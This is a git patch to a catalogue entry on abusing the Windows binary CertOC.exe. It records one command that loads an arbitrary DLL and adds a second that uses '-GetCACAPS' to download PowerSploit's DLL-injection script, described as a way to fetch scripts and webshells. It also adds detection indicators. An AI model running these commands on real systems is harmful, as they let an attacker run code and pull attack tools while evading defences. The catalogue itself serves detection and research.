From 97f5042a586880b13be9b3c097d9271fe798b85d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ensar=20=C5=9Eamil?= Date: Wed, 27 Oct 2021 12:02:52 +0300 Subject: [PATCH] Update Certoc.yml (#168) Co-authored-by: Wietze --- yml/OSBinaries/Certoc.yml | 16 +++++++++++++--- 1 file changed, 13 insertions(+), 3 deletions(-) diff --git a/yml/OSBinaries/Certoc.yml b/yml/OSBinaries/Certoc.yml index 54e5fd1..94bc2e4 100644 --- a/yml/OSBinaries/Certoc.yml +++ b/yml/OSBinaries/Certoc.yml @@ -2,7 +2,7 @@ Name: CertOC.exe Description: Used for installing certificates Author: 'Ensar Samil' -Created: '2021-10-07' +Created: 2021-10-07 Commands: - Command: certoc.exe -LoadDLL "C:\test\calc.dll" Description: Loads the target DLL file @@ -10,8 +10,16 @@ Commands: Category: Execute Privileges: User MitreID: T1218 - MitreLink: https://attack.mitre.org/wiki/Technique/T1218 - OperatingSystem: Windows Server 2022 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows Server 2022 + - Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1 + Description: Downloads text formatted files + Usecase: Download scripts, webshells etc. + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/techniques/T1105/ + OperatingSystem: Windows Server 2022 Full_Path: - Path: c:\windows\system32\certoc.exe - Path: c:\windows\syswow64\certoc.exe @@ -20,8 +28,10 @@ Code_Sample: Detection: - IOC: Process creation with given parameter - IOC: Unsigned DLL load via certoc.exe + - IOC: Network connection via certoc.exe Resources: - Link: https://twitter.com/sblmsrsn/status/1445758411803480072?s=20 + - Link: https://twitter.com/sblmsrsn/status/1452941226198671363?s=20 Acknowledgement: - Person: Ensar Samil Handle: '@sblmsrsn'